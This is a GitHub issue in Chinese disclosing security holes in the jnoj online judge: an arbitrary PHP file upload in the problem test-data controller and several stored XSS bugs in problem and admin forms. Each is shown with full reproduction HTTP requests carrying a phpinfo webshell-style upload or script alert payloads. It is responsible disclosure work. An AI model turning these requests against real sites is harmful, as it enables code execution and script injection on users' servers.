search

shi-yang / jnoj

Jiangnan Online Judge
https://www.jnoj.dev
Other
241 stars 62 forks source link

多处安全问题 #51

Closed thiscodecc closed 5 years ago

thiscodecc commented 5 years ago

1.任意文件上传.

代码位置: namespace app\modules\polygon\controllers\ProblemController. 213到228行.

 public function actionTests($id)
    {
        $model = $this->findModel($id);
        $solutionStatus = Yii::$app->db->createCommand("SELECT * FROM {{%polygon_status}} WHERE problem_id=:pid AND language IS NULL", [
            ':pid' => $model->id
        ])->queryOne();
        if (Yii::$app->request->isPost) {
            $inputFile = file_get_contents($_FILES["file"]["tmp_name"]);
            file_put_contents($_FILES["file"]["tmp_name"], preg_replace("(\r\n)","\n", $inputFile));
            @move_uploaded_file($_FILES["file"]["tmp_name"], Yii::$app->params['polygonProblemDataPath'] . $model->id . '/' . $_FILES["file"]["name"]);
        }
        return $this->render('tests', [
            'model' => $model,
            'solutionStatus' => $solutionStatus
        ]);
    }

发一个HTTP请求内容如下:

POST /jnoj/web/polygon/problem/tests?id=2&file= HTTP/1.1
cache-control: no-cache
Postman-Token: b3ac3880-1ebb-4446-8692-a1a7908d38fa
User-Agent: PostmanRuntime/7.6.0
Accept: */*
Host: 192.168.214.148:8111
Cookie: ckCsrfToken=y0nXbPW5yO2ZYYahLA4d6g4Vh5qhE3Esw9hHiZMI; _identity=0c02f9edeeebe8f90ed3b999269175b42d95229042b2abafccb9fcde4c391d22a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22aKH9oer3-sKQJi5ORU3VZh-CFlncQcdY%22%2C2592000%5D%22%3B%7D; _csrf=7773de4119f34c2949dcf5dc278c13290296d8d5de3a25a753ff95dcfab4f935a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22GRGF6U3QFJxl7NAUg2xkrE85e_mRCOA7%22%3B%7D; PHPSESSID=nh6rh8731c2702be06d9ug3klt
Accept-Encoding: gzip, deflate
content-type: multipart/form-data; boundary=--------------------------993388030406276728804269
Content-Length: 232
Connection: close

----------------------------993388030406276728804269
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php

echo phpinfo();

?>
----------------------------993388030406276728804269--

请求成功后访问url

200

2.创建问题处标题存在,存储型xss漏洞

Payload

POST /jnoj/web/polygon/problem/create HTTP/1.1
Host: 192.168.214.148:8111
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15" onclick="alert(1)" a"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
Connection: close
Referer: http://192.168.214.148:8111/jnoj/web/polygon/problem/create
Cookie: PHPSESSID=78t6a2u2kgqeo8gmorcc2srtgl; _csrf=153510a10229399e40f5bb7c7733d4c9a6e924add34f0113bd20bbffc3d1d13ca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22MfPPyjq_kQfKiWsTx4OYa3tUGHmbYZCw%22%3B%7D; _identity=8092f836542b046b6931fe23757d80e603cc4ec9851f04cdd215f688d8c3f823a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B5%2C%22uICh19XRxE7EeTALERQH8FAGwXu9J51j%22%2C2592000%5D%22%3B%7D
Upgrade-Insecure-Requests: 1

_csrf=wtOLGZhaHk5SqjzsMg6kdf_zGesVri1U1cqASZiZS_iPtdtJ4TBvETn7WqdbWdchh8dWsnSdWQGSgu0rwcMIjw==&Problem[title]=aaaabbbb<script>alert('xss')</script>aaaabbbb

查看问题标题列表即可触发.

300100

3.问题详情页面多处存在xss代码 编辑标题,进行内容补充修改.这里部分参数是由前端把html标签转义成html实体,然后传给PHP后端,这样写很不安全,抓包把对应的参数给修改就可以了,前端转义标签没有意义.修改后的参数如下.

Payload

POST /jnoj/web/polygon/problem/update?id=7 HTTP/1.1
Host: 192.168.214.148:8111
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15" onclick="alert(1)" a"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1426
Connection: close
Referer: http://192.168.214.148:8111/jnoj/web/polygon/problem/update?id=7
Cookie: PHPSESSID=78t6a2u2kgqeo8gmorcc2srtgl; _csrf=153510a10229399e40f5bb7c7733d4c9a6e924add34f0113bd20bbffc3d1d13ca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22MfPPyjq_kQfKiWsTx4OYa3tUGHmbYZCw%22%3B%7D; _identity=8092f836542b046b6931fe23757d80e603cc4ec9851f04cdd215f688d8c3f823a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B5%2C%22uICh19XRxE7EeTALERQH8FAGwXu9J51j%22%2C2592000%5D%22%3B%7D
Upgrade-Insecure-Requests: 1

_csrf=HgqxnDZE_N9BxUyJK4RbVDrSWuzPm90WE3rQuLHtVmxTbOHMTy6NgCqUKsJC0ygAQuYVta6oqUNUMr3a6LcVGw==&Problem[title]=aaaabbbb<script>alert('xss')</script>aaaabbbb&Problem[time_limit]=1&Problem[memory_limit]=128&Problem[description]=<p>asd<script>alert('xss02')</script>;aaaabbbb</p>&Problem[input]=<p>aaaabbbb<script>alert('xss03')</script>&gt;aaaabbbb</p>&Problem[output]=<p><script>alert('xss04')</script>aaaabbbb</p>&Problem[sample_input]=aaaabbbb<script>alert('xss 05')</script>aaaabbbb&Problem[sample_output]=aaaabbbb<script>alert('xss 06')</script>aaaabbbb&Problem[sample_input_2]=aaaabbbb<script>alert('xss 07')</script>aaaabbbb&Problem[sample_output_2]=aaaabbbb<script>alert('xss 08')</script>aaaabbbb&Problem[sample_input_3]=aaaabbbb<script>alert('xss 09')</script>aaaabbbb&Problem[sample_output_3]=aaaabbbb<script>alert('xss 10')</script>aaaabbbb&Problem[spj]=&Problem[spj]=0&Problem[hint]=<p><script>alert('xss14')</p>&Problem[tags]=aaaabbbb<script>alert('xss 12')</script>aaaabbbb

查看问题详情时 会触发6次xss代码.

600

6次集中在这里

6001 7001

PHP后端处理对hint参数的过滤规则如下

namespace app\modules\polygon\models\Problem 123行
$hint = preg_replace("/(\s|\&nbsp\;| |\xc2\xa0)/", '', strip_tags($this->hint));

这样写可以被绕过.因为是先去掉html标签,在进行了一次替换.

00001

这个参数在前端输出的时候,前端也进行了一次过滤,到是没有产生影响.

我看了下后台管理也有几处XSS漏洞.

4.在后台创建问题时,HTTP请求如下

POST /jnoj/web/admin/problem/create HTTP/1.1
Host: 192.168.214.148:8111
Content-Length: 847
Cache-Control: max-age=0
Origin: http://192.168.214.148:8111
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.214.148:8111/jnoj/web/admin/problem/create
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ckCsrfToken=y0nXbPW5yO2ZYYahLA4d6g4Vh5qhE3Esw9hHiZMI; _identity=0c02f9edeeebe8f90ed3b999269175b42d95229042b2abafccb9fcde4c391d22a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22aKH9oer3-sKQJi5ORU3VZh-CFlncQcdY%22%2C2592000%5D%22%3B%7D; _csrf=7773de4119f34c2949dcf5dc278c13290296d8d5de3a25a753ff95dcfab4f935a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22GRGF6U3QFJxl7NAUg2xkrE85e_mRCOA7%22%3B%7D; PHPSESSID=itcn06esd5pbvo9173rcidfmbl
Connection: close

_csrf=uFlAFx9vAKQeVYitGnbYYkvqpzI2IseyK6l2-C1MwKP_CwdRKToz9Vgf8MEtOJk3LNjfWURn_4dO9huqbgOBlA==&Problem[id]=123&Problem[title]=<script>alert('xss')</script>&Problem[time_limit]=1&Problem[memory_limit]=128&Problem[status]=&Problem[status]=0&Problem[description]=<p>&nbsp;</p>&Problem[input]=<p>&nbsp;</p>&Problem[output]=<p>&nbsp;</p>&Problem[sample_input]=<script>alert('xss')</script>&Problem[sample_output]=<script>alert('xss')</script>&Problem[sample_input_2]=&Problem[sample_output_2]=&Problem[sample_input_3]=&Problem[sample_output_3]=&Problem[spj]=&Problem[spj]=0&Problem[hint]=<p>&nbsp;</p>&Problem[source]=&Problem[tags]=&Problem[contest_id]=

触发页面

100 10001 10003

5.后台设置页面,在设置页面加上xss代码后,前后台每个页面都会触发.

20000 20001 200004

后面的这两个后台xss漏洞,因为要登录后台才行,危险性很小.

thiscodecc commented 5 years ago

代码 app\modules\admin\controllers\ProblemController 307->317行 这里也有任意文件上传.